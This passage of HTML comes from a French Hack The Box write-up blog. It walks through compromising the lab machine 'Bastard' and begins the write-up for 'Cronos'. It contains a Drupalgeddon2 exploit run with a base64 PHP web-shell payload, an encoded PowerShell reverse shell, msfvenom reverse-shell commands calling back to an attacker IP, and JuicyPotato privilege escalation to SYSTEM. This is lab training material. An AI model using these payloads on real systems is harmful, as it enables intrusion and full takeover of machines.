</span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ruby 44449.rb http://10.10.10.9 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> --<span class="o">==[</span>::#Drupalggedon2::<span class="o">]==</span>-- </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Target : http://10.10.10.9/ </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Found : http://10.10.10.9/CHANGELOG.txt <span class="o">(</span>HTTP Response: 200<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Drupal!: v7.54 </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Form <span class="o">(</span>user/password<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Result : Form valid </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Clean URLs </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Result : Clean URLs enabled </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Code Execution <span class="o">(</span>Method: name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Payload: <span class="nb">echo</span> CGATSMRW </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Result : CGATSMRW </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Good News Everyone! Target seems to be exploitable <span class="o">(</span>Code execution<span class="o">)</span>! w00hooOO! </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Existing file <span class="o">(</span>http://10.10.10.9/shell.php<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Response: HTTP <span class="m">404</span> // Size: <span class="m">12</span> </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Writing To Web Root <span class="o">(</span>./<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Payload: <span class="nb">echo</span> PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 <span class="p">|</span> base64 -d <span class="p">|</span> tee shell.php </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Target is NOT exploitable <span class="o">[</span>2-4<span class="o">]</span> <span class="o">(</span>HTTP Response: 404<span class="o">)</span>... Might not have write access? </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Existing file <span class="o">(</span>http://10.10.10.9/sites/default/shell.php<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Response: HTTP <span class="m">404</span> // Size: <span class="m">12</span> </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Writing To Web Root <span class="o">(</span>sites/default/<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Payload: <span class="nb">echo</span> PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 <span class="p">|</span> base64 -d <span class="p">|</span> tee sites/default/shell.php </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Target is NOT exploitable <span class="o">[</span>2-4<span class="o">]</span> <span class="o">(</span>HTTP Response: 404<span class="o">)</span>... Might not have write access? </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Existing file <span class="o">(</span>http://10.10.10.9/sites/default/files/shell.php<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Response: HTTP <span class="m">404</span> // Size: <span class="m">12</span> </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Writing To Web Root <span class="o">(</span>sites/default/files/<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Moving : ./sites/default/files/.htaccess </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak<span class="p">;</span> <span class="nb">echo</span> PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 <span class="p">|</span> base64 -d <span class="p">|</span> tee sites/default/files/shell.php </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Target is NOT exploitable <span class="o">[</span>2-4<span class="o">]</span> <span class="o">(</span>HTTP Response: 404<span class="o">)</span>... Might not have write access? </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> FAILED : Couldn<span class="err">&#39;</span>t find a writeable web path </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dropping back to direct OS commands </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\i</span>usr </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; dir </span></span><span class="line"><span class="cl">Volume in drive C has no label. </span></span><span class="line"><span class="cl"> Volume Serial Number is C4CD-C60B </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory of C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">19/03/2017 09:04 �� &lt;DIR&gt; . </span></span><span class="line"><span class="cl">19/03/2017 09:04 �� &lt;DIR&gt; .. </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">317</span> .editorconfig </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">174</span> .gitignore </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 5.969 .htaccess </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 6.604 authorize.php </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 110.781 CHANGELOG.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 1.481 COPYRIGHT.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">720</span> cron.php </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; includes </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">529</span> index.php </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 1.717 INSTALL.mysql.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 1.874 INSTALL.pgsql.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">703</span> install.php </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 1.298 INSTALL.sqlite.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 ��17.995 INSTALL.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 ��18.092 LICENSE.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 8.710 MAINTAINERS.txt </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; misc </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; modules </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; profiles </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 5.382 README.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 2.189 robots.txt </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; scripts </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; sites </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; themes </span></span><span class="line"><span class="cl">19/03/2017 01:42 ��19.986 update.php </span></span><span class="line"><span class="cl">19/03/2017 01:42 ��10.123 UPGRADE.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 2.200 web.config </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">417</span> xmlrpc.php </span></span><span class="line"><span class="cl"> <span class="m">21</span> File<span class="o">(</span>s<span class="o">)</span> 217.261 bytes </span></span><span class="line"><span class="cl"> <span class="m">9</span> Dir<span class="o">(</span>s<span class="o">)</span> 4.135.231.488 bytes free </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; dir C:<span class="se">\U</span>sers </span></span><span class="line"><span class="cl">Volume in drive C has no label. </span></span><span class="line"><span class="cl"> Volume Serial Number is C4CD-C60B </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory of C:<span class="se">\U</span>sers </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">19/03/2017 08:35 �� &lt;DIR&gt; . </span></span><span class="line"><span class="cl">19/03/2017 08:35 �� &lt;DIR&gt; .. </span></span><span class="line"><span class="cl">19/03/2017 02:20 �� &lt;DIR&gt; Administrator </span></span><span class="line"><span class="cl">19/03/2017 02:54 �� &lt;DIR&gt; Classic .NET AppPool </span></span><span class="line"><span class="cl">19/03/2017 08:35 �� &lt;DIR&gt; dimitris </span></span><span class="line"><span class="cl">14/07/2009 07:57 �� &lt;DIR&gt; Public </span></span><span class="line"><span class="cl"> <span class="m">0</span> File<span class="o">(</span>s<span class="o">)</span> <span class="m">0</span> bytes </span></span><span class="line"><span class="cl"> <span class="m">6</span> Dir<span class="o">(</span>s<span class="o">)</span> 4.134.649.856 bytes free </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\d</span>imitris<span class="se">\D</span>esktop<span class="se">\u</span>ser.txt </span></span><span class="line"><span class="cl">292f.....ec9d </span></span></code></pre></td></tr></table> </div> </div><h3 id="stable-shell">Stable Shell </h3><p>En allant sur <a class="link" href="https://www.revshells.com/" target="_blank" rel="noopener" >https://www.revshells.com/</a>, j&rsquo;ai pu générer rapidement un script de revershell. J&rsquo;ai utilisé :</p> <ul> <li>PowerShell #3 (Base64)</li> </ul> <p>Ce qui m&rsquo;a donné la commande suivante. Pratique, car aucun caractère spécial.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">powershell -e <span class="nv">JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgA1ACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA</span><span class="o">==</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">exegol-pentest Bastard $ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1337 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1337 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9:57491. </span></span><span class="line"><span class="cl">PS C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54&gt; whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\i</span>usr </span></span></code></pre></td></tr></table> </div> </div><h3 id="better-stable-shell">Better Stable Shell </h3><p>J&rsquo;ai trouvé un moyen de faire un shell encore plus stable. Le privesc ne marchait meme pas avec l&rsquo;autre shell&hellip; On ne voyait pas les erreurs non plus. Il vaut mieu generer avec msfvenom un shell.exe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msfvenom -p windows/x64/powershell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.25 <span class="nv">LPORT</span><span class="o">=</span><span class="m">9999</span> -a x64 --platform windows -e x64/xor_dynamic -b <span class="s1">&#39;\x00&#39;</span> -f exe -o shell.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54&gt; .<span class="se">\s</span>hell.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">9999</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9999 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9999 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9:57676. </span></span><span class="line"><span class="cl">Windows PowerShell running as user BASTARD$ on BASTARD </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="seimpersonateprivilege---juicypotato">SEImpersonatePrivilege - JuicyPotato </h3><p>On exploit avec JuicyPotato (j&rsquo;ai vraiment beaucoup galérer&hellip;). On génére un deuxieme rev shell en .exe sur un autre port :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msfvenom -p windows/x64/powershell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.25 <span class="nv">LPORT</span><span class="o">=</span><span class="m">8888</span> -a x64 --platform windows -e x64/xor_dynamic -b <span class="s1">&#39;\x00&#39;</span> -f exe -o shell2.exe </span></span></code></pre></td></tr></table> </div> </div><p>On copie shell2.exe sur la machine puis on execute JuicyPotato.exe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54&gt; ./JP.exe -p cmd.exe -a <span class="s1">&#39;/c C:\inetpub\drupal-7.54\shell2.exe&#39;</span> -l <span class="m">4444</span> -t * -c <span class="s1">&#39;{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}&#39;</span> </span></span><span class="line"><span class="cl">Testing <span class="o">{</span>9B1F122C-2982-4e91-AA8B-E071D54F2A4D<span class="o">}</span> <span class="m">4444</span> </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> authresult <span class="m">0</span> </span></span><span class="line"><span class="cl"><span class="o">{</span>9B1F122C-2982-4e91-AA8B-E071D54F2A4D<span class="o">}</span><span class="p">;</span>NT AUTHORITY<span class="se">\S</span>YSTEM </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> CreateProcessWithTokenW OK </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">exegol-pentest /workspace $ nc -lnvp <span class="m">8888</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::8888 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:8888 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9:57681. </span></span><span class="line"><span class="cl">Windows PowerShell running as user BASTARD$ on BASTARD </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">47f4.....3c54 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>un reverse shell en utilisant msfvenom semble plus stable (affiche les erreurs aussi) que le powershell -e &hellip;. que j&rsquo;ai utilisé. Peut etre a utilisé en priorité la prochaine fois ?</li> <li>Attention au CLSID. Toujours tester plusieurs. NE JAMAIS FAIRE CONFIANCE A CELUI PAR DEFAUT. Regarder sur : <ul> <li><a class="link" href="https://ohpe.it/juicy-potato/CLSID/" target="_blank" rel="noopener" >https://ohpe.it/juicy-potato/CLSID/</a></li> <li><a class="link" href="https://github.com/ohpe/juicy-potato/tree/master/CLSID/" target="_blank" rel="noopener" >https://github.com/ohpe/juicy-potato/tree/master/CLSID/</a></li> </ul> </li> </ul>HTB | Cronoshttps://leopoldabgn.github.io/writeups/p/cronos-htb/Fri, 11 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/cronos-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Cronos cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Cronos</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.13</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -p- -An -vvv 10.10.10.13 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 18b973826f26c7788f1b3988d802cee8 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkOUbDfxsLPWvII72vC7hU4sfLkKVEqyHRpvPWV2+5s2S4kH0rS25C/R+pyGIKHF9LGWTqTChmTbcRJLZE4cJCCOEoIyoeXUZWMYJCqV8crflHiVG7Zx3wdUJ4yb54G6NlS4CQFwChHEH9xHlqsJhkpkYEnmKc+CvMzCbn6CZn9KayOuHPy5NEqTRIHObjIEhbrz2ho8+bKP43fJpWFEx0bAzFFGzU0fMEt8Mj5j71JEpSws4GEgMycq4lQMuw8g6Acf4AqvGC5zqpf2VRID0BDi3gdD1vvX2d67QzHJTPA5wgCk/KzoIAovEwGqjIvWnTzXLL8TilZI6/PV8wPHzn </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 1ae606a6050bbb4192b028bf7fe5963b <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWsTNMJT9n5sJr5U1iP8dcbkBrDMs4yp7RRAvuu10E6FmORRY/qrokZVNagS1SA9mC6eaxkgW6NBgBEggm3kfQ<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 1a0ee7ba00cc020104cda3a93f5e2220 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBIQsAL/XR/HGmUzGZgRJe/1lQvrFWnODXvxQ1Dc+Zx </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">63</span> ISC BIND 9.10.3-P4 <span class="o">(</span>Ubuntu Linux<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> dns-nsid: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ bind.version: 9.10.3-P4-Ubuntu </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: POST OPTIONS GET HEAD </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Apache2 Ubuntu Default Page: It works </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="dig">dig </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span 